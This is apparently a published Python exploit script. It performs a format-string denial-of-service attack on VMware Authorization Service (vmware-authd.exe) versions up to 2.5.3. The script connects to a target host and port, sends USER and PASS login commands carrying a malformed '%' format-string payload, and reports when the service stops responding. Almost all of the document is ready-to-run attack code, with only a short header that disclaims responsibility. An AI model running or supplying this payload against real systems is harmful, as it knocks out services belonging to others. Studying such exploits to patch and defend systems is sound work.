# ---------------------------------------------------------------------------- # VMware Authorization Service <= 2.5.3 (vmware-authd.exe) Format String DoS # url: http://www.vmware.com/ # # author: shinnai # mail: shinnai[at]autistici[dot]org # site: http://www.shinnai.net # # This was written for educational purpose. Use it at your own risk. # Author will be not responsible for any damage. # # Tested on Windows XP Professional Ita SP3 full patched # ---------------------------------------------------------------------------- # usage: C:\>exploit.py 127.0.0.1 912 import socket import time import sys host = str(sys.argv[1]) port = int(sys.argv[2]) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: conn = s.connect((host, port)) d = s.recv(1024) print "Server <- " + d s.send('USER \x25\xFF \r\n') print 'Sending command "USER" + evil string...' d = s.recv(1024) print "Server response <- " + d s.send('PASS \x25\xFF \r\n') print 'Sending command "PASS" + evil string...' try: d = s.recv(1024) print "Server response <- " + d except: print "\nExploit completed..." except: print "Something goes wrong honey..."